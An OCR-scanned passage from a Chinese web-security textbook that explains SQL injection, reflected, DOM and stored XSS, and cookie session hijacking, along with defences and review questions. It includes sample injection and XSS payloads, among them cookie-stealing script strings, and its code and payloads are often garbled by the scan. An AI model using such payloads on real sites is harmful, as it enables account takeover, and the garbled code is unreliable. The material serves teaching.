不 可 能 的 。 然 而 像 PHP、ASP, 并 没有 强制 要 求 处 理 数据 类 型 ,这 类 语言 会 根据 参数 自动 
推导 出 数据 类 型 ,假设 id 二 1, 则 推导 ID 的 数据 类 型 为 integer;id 二 str, 则 推导 ID 的 数据 
类 型 为 string。 这 一 特点 在 弱 类 型 语言 中 是 相当 不 安全 的 。 如 ， 

SidS Ga 'id"]; 

$sql= "select * fram news where id- $ig;"; 

Snews= exec ($sql); 

攻击 者 可 能 把 id 参数 变 为 1 and 1==2 union select username,password from users; 
一 一 ,这 里 并 没 对 $id 变量 转换 数据 类 型 ,PHP 自动 把 变量 $id 推导 为 string 类 型 , 带 入 
数据 库 查 询 , 造 成 SQL 注入 漏洞 。 

防御 数字 型 注入 相对 来 说 是 比较 简单 的 ,只 需要 在 程序 中 严格 判断 数据 类 型 即 可 。 
如 使 用 is_numeric() ,ctype_digit() 等 函数 判断 数据 类 型 , 即 可 解决 数字 型 注入 。 

2. 特殊 字符 转 义 

通过 加 强 数 据 类 型 验证 可 以 解决 数字 型 的 SQL 注入 ,字符 型 却 不 可 以 ,因为 它们 都 
是 string 类 型 ,你 无 法 判断 输入 是 否 是 恶意 攻击 。 那 么 最 好 的 办 法 就 是 对 特殊 字符 进行 
转 义 。 因 为 在 数据 库 查询 字符 串 时 ,任何 字符 串 都 必须 加 上 单 引 号 。 既 然 知道 攻击 者 在 
字符 型 注入 中 必然 会 出 现 单 引 号 等 特殊 字符 ,那么 将 这 些 特殊 字符 转 义 即 可 防御 字符 型 
SQL 注入 。 例 如 ,用 户 搜索 数据 : 


http:/Aww.xxser.comnews?tag= 电影 
SQL 注入 语句 如 下 : 


select title, content from news where tag= '% 电影 ' and l=2 wnion select usemanme, password from users 

< 

防止 SQL 注入 应 该 在 程序 中 判断 字符 串 是 否 存 在 敏感 字符 ,如 果 存 在 , 则 根据 相应 
的 数据 库 进行 转 义 。 如 MySQL 使 用 “\” 转 义 ,如 果 以 上 代码 使 用 数据 库 为 MySQL ,那么 
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转 义 后 的 SQL 语句 如 下 : 


select title, content fram news where tag= '% 电影 \" and |=2 wion select username, password from users 

Se 

在 介绍 特殊 字符 转 义 过 滤 SQL 注入 时 ,就 不 得 不 提起 另 一 种 非常 难以 防范 的 SQL 
注入 攻击 : 二 次 注入 攻击 。 

以 PHP 为 例 ,PHP 在 开启 magic_quotes_gpc 后 ,将 会 对 特殊 字符 转 义 ,比如 ,将 过 
滤 为 \, 如 下 SQL 语句 : 


$sq= "insert into message (id, title, ontent) values (1, '$title', '$omtent')"; 

插入 数据 时 ,如 果 存在 单 引号 等 敏感 字符 ,将 会 被 转 义 ,现在 通过 网 站 插入 数据 : id 
为 3,title 为 secbug'、content 为 secbug. org, 那 么 SQL 语句 如 下 : 

insert into message (ig, title, oontent) values (3, 'sedoud\ '', 'sediug.org') 

单 引号 已 经 被 转 义 ,这 样 注 和 攻击 就 无 法 成 功 。 但 请 注意 ,secbug\' 在 插入 数据 库 后 
却 没有 “\”, 语 句 如 下 : 


id title content 


1 secbug' secbug. org 


这 里 可 以 试想 一 下 ,如果 另 有 一 处 查询 为 ; 
select ijq,， title，content fram message where title= '$title' 


那么 这 种 攻击 就 称 为 二 次 SQL 注入 。 


8.3 XSS 跨 站 脚本 漏洞 


XSS 又 称 为 CSS(Cross Site Scripting), 即 跨 站 脚本 攻击 ,是 最 常见 的 Web 应 用 程序 
安全 漏洞 之 一 ,在 2013 年 度 OWASP top 10 中 排名 第 三 。 

XSS 是 指 攻击 者 在 网 页 中 嵌入 客户 端 脚 本 ,通常 是 用 JavaScript 编写 的 恶意 代码 ， 
当 用 户 使 用 浏览 器 浏览 被 嵌入 恶意 代码 的 网 页 时 ,恶意 代码 将 会 在 用 户 的 浏览 器 上 
执行 。 

从 上 述 内 容 可 知 ,XSS 属于 客户 端 攻击 ,受害 者 最 终 是 用 户 。 不 要 以 为 受害 者 是 用 
户 ,就 认为 跟 自己 的 网 站 、 服 务 器 安全 没有 关系 。 但 请 注意 , 千 万 不 要 忘记 网 站 管理 人 员 
也 属于 用 户 之 一 ,这 就 意味 着 XSS 可 以 攻击 “服务 器 端 "。 因 为 管理 员 要 比 普通 用 户 的 权 
限 大 得 多 ,一 般 管理 员 都 可 以 对 网 站 进行 文件 管理 ,数据 管理 等 操作 ,而 攻击 者 就 有 可 能 
靠 管理 员 身 份 作 为 “跳板 ”实施 攻击 。 


831 XS 原理 解析 
XSS 攻击 是 在 网 页 中 岩 入 客户 端 恶 意 脚本 代码 ,这 些 恶 意 代码 一 般 是 使 用 
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JavaScript 语言 编写 的 (也 有 使 用 ActionScript、VBScript 等 客户 端 脚 本 语言 编写 的 )。 所 
以 ,如果 想 要 深入 研究 XSS, 必 须要 精通 JavaScript。JavaScript 能 做 到 什么 ,XSS 的 威力 
就 有 多 大 。 

JavaScript 可 以 用 来 获取 用 户 的 Cookie, 改 变 网 页 内 容 、.URL 调转 ,那么 存在 XSS 漏 
洞 的 网 站 ,就 可 以 盗 取 用 户 Cookie、 黑 掉 页 面 .导航 到 恶意 网 站 ,而 攻击 者 需要 做 的 仅仅 
是 向 Web 页 面 中 注入 JavaScript 代码 。 

下 面 是 一 段 最 简单 的 XSS 漏洞 实例 ,其 代码 很 简单 ,在 Index. html 页 面 中 提交 数据 
后 ,在 PrintStr 页 面 显示 。 

Index. html 页 面 代 码 如 下 : 

< form action= "PrintStr" method= "post"> 

< input typer "text" name= "username" /> < input type= "sutmit" value= "提交 " /> 

< /fom> 

PrintStr 页 面 代码 如 下 : 


<% 

String name= request .getParameter ("usemame"); 
out.println (" 您 输入 的 内 容 是 :"+ name); 

和 > 


当 输 入 一 script 二 alert(/xss/) 一 /script 二 时 ,将 触发 XSS 攻击 ,如 图 8-5 所 示 。 
攻击 者 可 以 在 二 script 二 与 二 /script 二 之 间 


输入 JavaScript 代码 ,实现 一 些 “ 特 殊 效 果 ”。 在 Ba 站 Creer dmirictrator\Deektop\printSt html 
真实 的 攻击 中 ,攻击 者 不 仅仅 弹出 一 个 框 ,通常 
使 用 二 script src 一 "http:// www. secbug. org/ rs 
x. txt" 记 过 /script 记 方式 来 加 载 外 部 脚本 ,而 在 外“ 
x. txt 中 就 存放 着 攻击 者 的 恶意 JavaScript 代 
码 , 这 段 代码 可 能 是 用 来 盗 取 用 户 的 Cookie, 也 至 
可 能 是 监控 键盘 记录 等 恶意 行为 。 
注意 : JavaScript 加 载 外 部 的 代码 文件 可 以 图 8-5 XSS 攻击 


是 任意 扩展 名 (无 扩展 名 也 可 以 ), 如 二 script src 一 "http://www. secbug. org/x. jpg" 二 
二 /script 记 ,即使 文件 为 图 片 扩 展 名 x.jpg, 但 只 要 其 文件 中 包含 JavaScript 代码 就 会 被 
执行 。 
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XSS 主要 分 为 三 类 ,分 别 是 反射 型 .存储 型 和 DOM 型 。 下 面 将 一 一 介绍 每 种 XSS 
类 型 的 特征 。 

1. 反射 型 XSS 

反射 型 XSS 也 称 为 非 持久 性 XSS, 是 现在 最 容易 出 现 的 一 种 XSS 漏洞 。 当 用 户 访 
问 一 个 带 有 XSS 代码 的 URL 请 求 时 ,服务 器 端 接收 数据 后 处 理 ,然后 把 带 有 XSS 代码 
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的 数据 发 送 到 浏览 器 ,浏览 器 解析 这 段 带 有 XSS 代码 的 数据 后 ,最 终 造成 XSS 漏洞 。 这 
个 过 程 就 像 一 次 反射 , 故 称 为 反射 型 XSS。 
下 面 举例 说 明 反 射 型 XSS 跨 站 漏洞 。 


< ?hp 
S$usemane=$_GET [ "username ' ]; 
echo Susername7 

> 

在 这 段 代码 中 ,程序 接收 username 值 后 再 输出 ,如 果 提 交 xss. php? username 一 
CUFE ,那么 程序 将 输出 CUFE, 如 果 恶 意 用 户 输入 usermame 王 二 script 二 XSS 恶意 代码 
到 /script> ,将 会 造成 反射 型 XSS 漏洞 。 

可 能 有 人 会 说 : 这 似乎 并 没有 造成 什么 危害 ,不 就 是 弹出 一 个 框 吗 ? 如 果 你 看 下 面 
这 个 例子 ,可 能 就 不 会 这 么 认为 了 。 假 如 http://www. secbug. org/xss. php 存在 XSS 
反射 跨 站 漏洞 ,那么 攻击 者 的 步 又 可 能 如 下 。 

(1) 用 户 CUFE 是 网 站 www. secbug. org 的 忠实 粉丝 ,此 时 正在 论坛 看 信息 。 

(2) 攻击 者 发 现 www. secbug. org/xss. php 存在 反射 型 XSS 漏洞 ,然后 精心 构造 
JavaScript 代码 ,此 段 代码 可 以 盗 取 用 户 Cookie 并 把 它 发 送 到 指定 的 站 点 www. 
XXSer. COm。 

(3) 攻击 者 将 带 有 反射 型 XSS 漏洞 的 URL 通过 站 内 信 发 送 给 用 户 CUFE, 站 内 信 
为 一 些 诱惑 信息 ,目的 是 为 让 用 户 CUFE 单 击 链接 。 

(4) 假设 用 户 CUFE 单 击 了 带 有 XSS 漏洞 的 URL, 那 么 将 会 把 自己 的 Cookie 发 送 
到 网 站 www. xxser. com。 

(5) 攻击 者 接收 到 用 户 CUFE 的 会 话 Cookie, 可 以 直接 利用 Cookie 以 CUFE 的 身 
份 登录 www. secbug. org, 从 而 获取 用 户 CUFE 的 敏感 信息 。 

以 上 步骤 ,通过 使 用 反射 型 XSS 漏洞 可 以 以 CUFE 的 身份 登录 网 站 ,这 就 是 其 危害 。 

2. DOM 型 XSS 

DOM(Document Object Model) 即 文档 对 象 模型 ,DOM 通常 用 于 代表 在 HTML、 
XHTML 和 XML 中 的 对 象 。 使 用 DOM 可 以 允许 程序 和 脚本 动态 地 访问 和 更 新 文档 的 
内 容 、 结 构 和 样式 。 

通过 JavaScript 可 以 重 构 整 个 HTML 页 面 ,而 要 重 构 页 面 或 者 页 面 中 的 某 个 对 象 ， 
JavaScript 就 需要 知道 HTML 文档 中 所 有 元 素 的 “位 置 *。DOM 为 文档 提供 了 结构 化 表 
示 , 并 定义 了 如 何 通过 脚本 来 访问 文档 结构 。 根 据 DOM 规定 ,HTML 文档 中 的 每 个 成 
分 都 是 一 个 结 点 。DOM 的 规定 如 下 。 

(1) 整个 文档 是 一 个 文档 结 点 。 

(2) 每 个 HTML 标签 是 一 个 元 素 结 点 。 

(3) 包含 在 HTML 元 素 中 的 文本 是 文本 结 点 。 

(4) 每 一 个 HTML 属性 是 一 个 属性 结 点 。 

(5) 结 点 与 结 点 之 间 都 有 等 级 关系 。 

HTML 的 标签 都 是 一 个 个 结 点 ,而 这 些 结 点 组 成 了 DOM 的 整体 结构 : 结 点 树 , 如 
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图 8-6 所 示 。 
文档 
| 
根 元 素 : 
<html> 
I 
元 素 : 元 素 : 
<head> <body> 
元 素 : 属性 : 元 素 : 元 素 : 
<title> href <a> <hl> 


文本 : 文本 : 文本 : 
“文档 标题 “我 的 链接 ”| | “我 的 标题 


图 8-6 HTML DOM 树 


简单 了 解 了 DOM 后 ,再 来 看 DOM 型 XSS 就 比较 简单 了 。 可 以 发 现 ,DOM 本 身 就 
代表 文档 的 意思 ,而 基于 DOM 型 的 XSS 是 不 需要 与 服务 器 端 交 互 的 , 它 只 发 生 在 客户 
端 处 理 数 据 阶段 。 

下 面 是 一 段 经 典 的 DOM 型 XSS 示例 。 

< Script> 

Var tarp= document .URL; /获取 UEL 

Var jndex= document .URL. indexOf ("oontent= ")+ 47 

Var par= tenp. sibstring (index) ; 

document .write GecodeURL (par) ); // 输 入 获取 内 容 

</script> 

上 述 代码 的 意思 是 获取 URL 中 content 参数 的 值 ,并 且 输 出 ,如 果 输 入 http:// 
www. secbug. org/dom. html? content 王 过 script 二 alert(/xss/) 一 /script 二 ,就 会 产生 
XSS 漏洞 。 

3. 存储 型 XSS 

存储 型 XSS 又 称 为 持久 性 XSS ,存储 型 XSS 是 最 危险 的 一 种 跨 站 脚本 。 

允许 用 户 存储 数据 的 Web 应 用 程序 都 可 能 会 出 现存 储 型 XSS 漏洞 , 当 攻击 者 提交 
一 段 XSS 代码 后 ,被 服务 器 端 接收 并 存储 , 当 攻 击 者 再 次 访问 某 个 页 面 时 ,这 段 XSS 代 
码 被 程序 读 出 来 响应 给 浏览 器 ,造成 XSS 跨 站 攻击 ,这 就 是 存储 型 XSS。 

存储 型 XSS 与 反射 型 XSS、DOM 型 XSS 相 比 ,具有 更 高 的 隐蔽 性 ,危害 性 也 更 大 。 
它们 之 间 最 大 的 区 别 在 于 反射 型 XSS 与 DOM 型 XSS 执行 都 必须 依靠 用 户 手动 去 触发 ， 
而 存储 型 XSS 却 不 需要 。 

下 面 是 一 个 比较 常见 的 存储 型 XSS 场景 示例 。 

在 测试 是 否 存 在 XSS 时 ,首先 要 确定 输入 点 与 输出 点 ,例如 ,要 在 留言 内 容 上 测试 
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XSS 漏洞 ,首先 就 要 去 寻找 留言 内 容 输出 (显示 ) 的 地 方 是 在 标签 内 还 是 在 标签 属性 内 ， 
或 者 在 其 他 地 方 ,如 果 输 出 的 数据 在 属性 内 ,那么 XSS 代码 是 不 会 被 执行 的 。 如 

< inmput type= "text" name= "content" value= "< script> alert (/XSS/)< /script> "/> 

以 上 JavaScript 代码 虽然 成 功 地 插入 到 了 HTML 中 ,但 却 无 法 执行 ,因为 XSS 代码 
出 现在 value 属性 中 ,被 当 作 值 来 处 理 ,最 终 浏览 器 解析 HTML 时 ,将 会 把 数据 以 文本 的 
形式 输出 在 网 页 中 。 

在 知道 了 输出 点 之 后 ,就 可 以 根据 相应 的 标签 构造 HTML 代码 来 闭合 ,插入 XSS 代 
码 为 “"/ 二 所 script>alert(/XSS/) 一 /script 盖 ”, 最 终 在 HTML 文档 中 为 : 

< inmput type= "text" name= "ontent" value= /><script>alert(WXSS/)< /script> "/> 

这 样 就 可 以 闭合 input 标签 ,使 输出 的 内 容 不 在 value 属性 中 ,从 而 造成 XSS 跨 站 
漏洞 。 

知道 了 最 基本 的 XSS 测试 技巧 后 ,下 面 来 看 看 具体 的 存储 型 XSS 漏洞 ,测试 步 又 
如 下 。 

(1) 添加 正常 的 留言 ,昵称 为 “Xxser”, 留 言 内 容 为 “HelloWorld”, 使 用 Firebug 快速 
寻找 显示 标签 ,发 现 标签 为 : 

< 1i> < strong> Xxser< /strong> < span class= "message"> HelloWorld< /span> < spanclass= "time"> 2013- 05 

—26 20:18:13 /span>< /1i> 

(2) 如 果 显 示 区 域 不 在 HTML 属性 内 , 则 可 以 直接 使 用 XSS 代码 注入 。 如 果 不 能 
得 知 内 容 输 出 的 具体 位 置 , 则 可 以 使 用 模糊 测试 方案 ,XSS 代码 如 下 。 

。 二 script 之 alert(document. cookie) 一 /script>: 普通 注入 ; 

。 "/ 二 二 script 二 alert(document. cookie) 一 /script 二 : 闭合 标签 注入 ; 

。 二 /textarea 二 "一 二 scriptalert(document. cookie) 一 /script 二 : 闭合 标签 注入 。 

(3) 在 插入 盗 取 Cookie 的 JavaScript 代码 后 ,重新 加 载 留言 页 面 ,XSS 代码 被 载 进 浏 
览 器 执行 ,如 图 8-7 所 示 。 

攻击 者 将 带 有 XSS 代码 的 留言 提交 到 数据 库 , 当 用 户 查看 这 段 留言 时 ,浏览 器 会 
把 XSS 代码 认为 是 正常 的 JavaScript 代码 来 执行 。 所 以 ,存储 型 XSS 具有 更 高 的 隐 
项 性 。 
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Cookie 是 能 够 让 网 站 服务 器 把 少量 文本 数据 存储 到 客户 端的 硬盘 、 内 存 , 或 是 从 客 
户 端的 硬盘 、 内 存 读 取 数 据 的 一 种 技术 。 

说 起 Cookie, 大 多 人 都 会 想到 HTTP 协议 。 因 为 HTTP 协议 是 无 状态 的 ,Web 服 
务 器 无 法 区 分 请 求 是 否 来 源 于 同一 个 浏览 器 。 所 以 ,Web 服务 器 需要 额外 的 数据 用 于 维 
护 会 话 。Cookie 正 是 一 段 随 HTTP 请 求 .响应 一 起 被 传递 的 额外 数据 , 它 的 主要 作用 是 
标识 用 户 ,维持 会 话 。 
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图 8-7 存储 型 XSS 跨 站 攻击 


当 你 浏览 某 个 网 站 时 ,该 网 站 可 能 往 你 的 电脑 硬盘 写 人 一 个 非常 小 的 文本 文件 , 它 可 
以 记录 你 的 用 户 ID 密码、 停留 的 时 间 等 信息 ,这 个 文件 就 是 Cookie 文件 。 当 你 再 次 来 
到 该 网 站 时 ,浏览 器 会 自动 检测 你 的 硬盘 ,并 将 存储 在 本 地 的 Cookie 发 送 给 网 站 ,网 站 通 
过 读 取 Cookie, 得 知 你 的 相关 信息 ,就 可 以 做 出 相应 的 动作 ,如 直接 登录 ,而 无 须 再 次 输 
入 账户 和 和 密码。 

Cookie 中 的 内 容 大 多 数 经 过 了 加 密 处 理 ,因此 ,一 般 用 户 看 来 只 是 一 些 毫 无 意义 的 
字母 数组 组 合 , 只 有 服务 器 的 处 理 程序 才 知 道 它们 真正 的 含义 。 每 个 Cookie 文件 都 是 一 
个 . txt 文件 ,都 以 “用 户 名 @ 网 站 URL? 来 命名 ,如 图 8-8 所 示 。 


cookie:administrator@soso.co cookie-administrator@wooyun. 9 getisp?n=6fca38db79c2684675 | ND) getit 
mW ee - 


7294458&|=192.168.1.100_169. 7688F2| 


各 9X08XSDJ.txt - 记事 本 二 
文件 (有 ” 编 纺 (E) 想 式 (O) 查看 (V) 帮助 (H) 
|_cfduidd2f19cd8877e9dc8c169dabl7ca07ce381433059453wooyun. org/ “ 
9728366416601630521929165527799130448504* 


图 8-8 Cookie 文 件 


1. 读 写 Cookie 
像 JavaScript、.PHP、ASP. NET 都 拥有 读 写 Cookie 的 能 力 。 下 面 以 CUFE 邮箱 登录 
页 面 为 例 ,通过 服务 器 端的 Servlet 代码 ,观察 HTTP 响应 Set-Cookie 首部 。 
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Public class MailIogin extends HttpServiet { 
Pblic void doGet (HttpServletRequest request, HttpServletResponse response) 
throws ServletExosption, ICExoasption { 
this.doPost (reqyest, response); } 
public void doPost (HttpServletRequest request, HttpServletResponse 
response) throws ServletExosption, ICExosption { 
PrintWriter out= response .getWriter (); 
Cookie c [ ]= regqnest.getCookies (); 
if(c 二 nml) { 
for(int i=0; i< c.lengthy i++) { 
Cookie cookie=c [i]; } 
} else { 
String usemame= request .getParameter ("usermname")7 
if(usemame !=null && !" ".equals (username)){ 
Cookie ck= new Cookie ("Name", usermame); 
response.addCookie (ck); } 


} 


在 这 段 服务 器 端的 Servlet 代码 中 ,将 会 获取 本 地 服务 器 上 的 Cookie, 如 果 Cookie 不 
为 空 ,就 遍历 数组 把 所 有 Cookie 值 取出 来 。 如 果 Cookie 为 空 ,就 获取 username 参数 值 ， 
并 且 将 值 写 人 Cookie 的 Name 字段 中 ,最 终 将 Cookie 发 送 到 客户 。 

第 一 次 访问 URL: http://mail. cufe. edu. cn/webmailgo. php?username 一 liyang, 本 
地 Cookie 为 空 ,观察 HTTP 协议 ,如 图 8-9 所 示 。 

再 次 请 求 登录 页 面 , 当 输 入 邮箱 账号 、 密 码 以 后 ,浏览 器 将 会 自动 带 入 HTTP Cookie 
首部 字段 ,并 且 其 中 带 有 属性 username 字段 ,如 图 8-10 所 示 。 

2. JavaSeript 操作 Cookie 

在 开发 中 使 用 Cookie 作为 身份 标识 是 很 普遍 的 事情 ,但 是 从 另 一 个 角度 来 看 ,如 果 
网 站 存在 XSS 跨 站 漏洞 .那么 利用 XSS 漏洞 就 有 可 能 盗 取 用 户 的 Cookie, 使 用 用 户 的 身 
份 标识 。 换 句 话 说 ,就 是 不 使 用 用 户 的 账号 和 密码 就 能 登录 用 户 的 账户 。 

当 用 户 正常 登录 CUFE 邮箱 ,刷新 主页 面 index. php, 然 后 拦截 请 求 (可 使 用 Burp 
Suite 工具 ) ,请 求 如 图 8-11 所 示 。 
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Parsed | Raw 
Method URL Version 
GET httpyWmailLcufe.educn:801 HTTPH.1 
Header Value 
cept age/gi imagefipeg, mageipipeg, magerpipeg, applicationb shockwave nash, applicalon/ 


Header Value 
Expires [Thu, 19 Nov 1981 08:52.00 GMT = 
Cache-Conirol Ino-Siore, no-cache, must-revalidale, postcheck=0, pre-checie0 
Pragma Ino-cache Insert 
SetCookie [=deleled expies=Thu 01-Jan-1970 00000T GMT = 
Set Cookie [se=deleted, expires=Thu, 01-Jan-1970 00:00:01 GMT 站 
etCookie LOGIN_AUTH_CODE=3 本 
etCookie AUTHLEFAIL_LCOUNTEdeleted expires=Thu, 0TJanr197000000T GMT 
Content Encoding gzip = 
图 8-9 服务 器 端 发 送 Set-Cookie 
Parsed | Raw 
Method URL Version 
[Ge ] [ntpmail cufe edu.cn-80r | bmp 
Header Value 

[accep mageng, mageipeg, magerppeo, mage/plpeo, applcatloni Shockwave nash, applicabon 

Accept Language hon 

[useragent Mozillard 0 Compaible WSIEBOIWindowSNTSTTIdeTAO NET CLR 20.50727, NET CL 

Accept Encoang ap defiate 网 | 

Prowy- Connector Keep-AIve Delete 

Host Imail.cufe. edu, cn 

oN 


图 8-10 浏览 器 自动 加 入 Cookie 请 求 


Gomment this Hew 


PosT > php?vid=1433056767 HTTP/1.1 

Accept: image/gif, image/jpeg, image/pipeg, image/pjpeg, application/x-shockvave-flash, 

application/x-ms-application, application/x-ms-xbap, application/vnd.ms-xpsdocument, 

lapplication/xaml+xml, */* 

Referer: http://mail.cufe.edu.cn/ 

Accept-Language: zh-cn 
Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; Trident/4.0; .NET CLR 
NET CLR 3.0.4506.2152; .NET CLR 3.5.30729) 

Content-Type: application/x-wwy-form-urlencoded 

Accept-Encoding: gzip, deflate 

Host: mail.cufe.edu.cn 

Content-Length: 373 

Pragma: no-cache 

Cookie: PHPSESSID=gm626pipkgchnks3bt7ueténll; LOGIN_AUTH CODE=3; cusername=liyang 


rlogin=14330667822616F_lang=%7BF_langs7DEF_tm=%7BF tmi7DEF loginkey=14330667676F_ logintype=0éF 
|_rsapassword=OLQWceNKamczOyoaDfwcrEBCVbQ73EP]JPs9pqu2NQL1R5BUQIuCZ9s3KTOoR37ks2BNoJEOmADqwaft5epB 
|azxs2BRGeFkaAArkouWVs2BMxs2FABLqzoiFyMI17xE65pqx30U2CAAScqQZ65IT24Viq2JNckvnUKYzmynncii5rBg2frxe 
Ykows3DEF_email=liyang&F_domain=cufeedu.cntF_passyword=6F_save_id=lkaccion.x=476action.y=15 
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以 上 这 段 HTTP 请 求 首部 可 以 看 到 有 Cookie 字段 ,这 就 是 Web 服务 器 向 客户 端 发 
送 的 Cookie, 当 攻击 者 拿 到 这 段 Cookie 后 ,就 可 以 使 用 当前 用 户 的 身份 登录 网 站 。 

攻击 者 重复 上 面 步骤 ,模拟 用 户 登 录 CUFE 邮箱 ,如果 发 现 有 Cookie 请 求 首 部 ,就 
替换 为 拿 到 的 用 户 的 Cookie, 继 续 执行 可 发 现 Cookie 已 经 蔡 换 为 指定 的 Cookie, 并 且 没 
有 输入 账号 和 密码 ,就 登录 到 了 用 户 的 邮箱 。 

通过 以 上 案例 可 以 得 知 ,攻击 者 通过 XSS 攻击 ,可 以 完成 “Cookie 支持 ”, 不 需要 输入 
密码 ,就 可 直接 以 正常 用 户 的 身份 登录 账户 。 然 而 需要 注意 的 是 ,有 些 开 发 者 使 用 
Cookie 时 ,不 会 当 作 身 份 验证 来 使 用 ,比如 ,存储 一 些 临时 信息 。 这 时 ,即使 黑客 拿 到 了 
Cookie 也 是 没有 用 处 的 。 并 不 是 说 只 要 有 Cookie ,就 可 以 "会 话 劫持 ”。 


834 修复 XSS 跨 站 漏洞 


XSS 路 站 漏洞 最 终 形成 的 原因 是 对 输入 与 输出 没有 严格 过 滤 , 在 页 面 执行 
JavaScript 等 客户 端 脚本 ,这 就 意味 着 只 要 将 敏感 字符 过 滤 , 即 可 修补 XSS 跨 站 漏洞 。 但 
是 这 一 过 程 却 是 复杂 的 ,很 多 情况 下 无 法 识别 哪些 是 正常 字符 ,哪些 是 非 正常 字符 。 

1. 输入 与 输出 

在 HTML 中 ,所 、>、" 等 都 有 比较 特殊 的 意义 ,因为 HTML 标签 .属性 就 是 由 这 几 
个 符号 组 成 的 。 如 果 直 接 输出 这 几 个 特殊 字符 , 极 有 可 能 破坏 整个 HTML 文档 的 结构 。 
所 以 ,一 般 情 况 下 ,XSS 将 这 些 特殊 字符 转 义 。 

在 PHP 中 提供 了 htmlspecialchars()、htmlentities() 等 函数 可 以 把 一 些 预定 义 的 字 
符 转 换 为 HTML 实体 。 预 定义 的 字符 如 下 。 

。 也 (和 号 ) 称 为 &amp; 

。“"( 双 引号 ) 称 为 & quot; 
。( 单 引号 ) 称 为 & #039; 
。 去 (小 于 ) 称 为 &lt; 
。 二 (大 于 ) 称 为 &gt。 
当 字 符 串 经 过 这 类 函数 处 理 后 ,敏感 字符 将 会 被 一 一 转 义 ,例如 ,PHP 代码 如 下 : 
< ahp 
@ $html=$ GET['xss']; 
if ($html) { 
echo html specialdhars ($html); 

此 时 在 提交 http://www. xxser. com/xss. php? xss 一 < script > alert (/xss/) 
所 /script 二 后 ,将 不 再 弹出 窗口 ,因为 敏感 字符 已 经 被 转 义 。 

2. HttpOnly 

HttpOnly 对 防御 XSS 漏洞 不 起 作用 ,主要 目的 是 为 了 解决 XSS 漏洞 后 续 的 Cookie 
劫持 攻击 。HttpOnly 是 微软 公司 的 Internet Explorer 6 SP1 引入 的 一 项 新 特性 。 这 个 
特性 为 Cookie 提供 了 一 个 新 属性 ,用 以 阻止 客户 端 脚本 访问 Cookie。 至 今 已 经 成 为 一 个 
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标准 ,几乎 所 有 的 浏览 器 都 支持 HttpOnly。 


在 XSS 会 话 劫持 时 ,介绍 了 如 何 使 用 JavaScript 获取 Cookie。 一 个 服务 器 可 能 会 向 
客户 端 发 送 多 条 Cookie, 但 是 带 有 HttpOnly 的 Cookie,JavaScript 将 不 能 获取 。 例 如 ， 
PHP 代码 如 下 : 

< hp 

heager ("Set— Cookie: usemame= root "); 
header ("Set— Cookie: password= password; Httponly" , false); 

> 

访问 这 个 页 面 时 ,使 用 浏览 器 查看 Cookie, 可 以 看 到 password 字段 后 面 有 了 
HttpOnly, 其 状态 类 似 于 图 8-12 所 示 。 


图 8-12 Set-Cookie 


这 样 就 代表 JavaScript 将 不 能 获取 被 HttpOnly 标注 的 Cookie 值 ,清空 浏览 器 地 址 栏 ， 
输入 “javascript: alert (document. cookie)” 语 句 测试 ,在 弹出 的 对 话 框 中 只 有 username 
字段 ,并 没有 看 到 password 字段 ,这 就 是 HttpOnly 的 作用 。 


8.4 本 章 小 结 


互联 网 时 代 的 数据 安全 与 个 人 隐私 受到 前 所 未 有 的 挑战 .Web 作为 未 来 云 计算 和 移 
动 互联 网 的 最 佳 载体 ,Web 安全 问题 受到 了 广泛 关注 ,针对 Web 的 攻击 也 一 直 不 断 发 展 

本 章 首先 介绍 了 Web 前 端 基础 知识 ,掌握 HTTP 协议 和 JavaScript 脚本 是 研究 
Web 安全 的 基本 功 。 接 下 来 ,介绍 了 SQL 注入 攻击 .是 因为 违背 了 “数据 与 代码 分 离 原 
则 ”导致 的 结果 。 它 有 两 个 条 件 : 一 是 用 户 能 够 控制 数据 的 输入 ;二 是 代码 拼凑 了 用 户 输 
入 的 数据 ,把 数据 当 作 代码 执行 了 。 只 需要 牢记 在 “拼凑 ?发生 的 地 方 进行 安全 检查 ,就 能 
避免 此 类 问题 。 最 后 ,讲述 了 XSS 攻击 ,进行 了 原理 分 析 ,并 从 攻击 者 的 角度 阐述 了 如 何 
实现 XSS 会 话 动 持 。XSS 漏洞 虽然 复杂 ,但 却 是 可 以 彻底 解决 的 ,真正 做 到 掌控 “输入 与 
输出 ”, 同 时 也 有 很 多 开源 项 目 为 我 们 提供 了 参考 。 


参考 文献 


[1] OWASP. OWASP Top 10. https://www.owasp.org,2013. 

[2] CNCERT. 2014 年 中 国 互 联网 网 络 安全 报告 . http://www. cert. org. cn,2015. 

[3] Victor Chapela. Advanced SQL Injection. http://www.owasp.org/images/7/74/ Advanced_SQL 
_Injection. ppt, 2005. 


Ne/ 信息 安全 导论 


[4] 诸葛 建 伟 , 叶 志和 远 ,分 维 . 攻击 技术 分 类 研究 . 计算 机 工程 ,2005,31(21): 121-123. 

[5] Gunter Ollmann. HTML Code Injection and Cross-Site Scripting. http://technicalinfo. net/ 
papers/CSS. html,2007. 

[6] 吴 翰 清 . 白 帽子 讲 Web 安全 . 北京 : 电子 工业 出 版 社 ,2014. 

[7] Charlie Miller. 黑客 攻防 技术 宝典 :Web 实战 篇 (第 2 版 ). 北京 : 人 民 邮 电 出 版 社 ,2012. 

[8] 张 炳 帅 ，Web 安全 深度 剖析 . 北京 : 电子 工业 出 版 社 ,2015. 

[9] 钟 晨 鸣 , 徐 少 培 ,Web 前 端 黑客 技术 揭秘 . 北京 : 电子 工业 出 版 社 ,2013. 

[10] Justin Clarke. SQL 注入 攻击 与 防御 (第 2 版 ). 北京 : 清华 大 学 出 版 社 ,2013. 

[11] 印 永 华 . XSS 跨 站 脚本 攻击 剖析 与 防御 . 北京 : 人 民 邮 电 出 版 社 ,2013. 

[12] J. Grossman,R. Hansen,P. D. Petkov,A. Rager,S. Fogie. XSS Attacks: Cross Site Scripting 

Exploits and Defense. Burlington, MA: Syngress,2007. 


. 简 述 常见 的 Web 威胁 有 哪些 ? 

. HTTP 报 文 的 首部 与 体 部 通常 由 哪 几 部 分 组 成 ? 

. 描述 SQL 注入 的 原理 。 

. SQL 注入 点 判断 常用 的 1=1,1=2 测试 法 是 如 何 进行 的 ? 
. 防止 SQL 注入 的 方法 有 哪些 ? 

. 列 出 3 处 HTML 页 面 中 可 执行 JavaScript 脚本 的 地 方 。 

. 说 明 XSS 跨 站 脚本 攻击 中 “ 跨 站 ”的 含义 。 

.比较 反射 型 XSS 和 存储 型 XSS。 

.Cookie 的 作用 是 什么 ? 为 什么 泄露 之 后 会 非常 危险 ? 

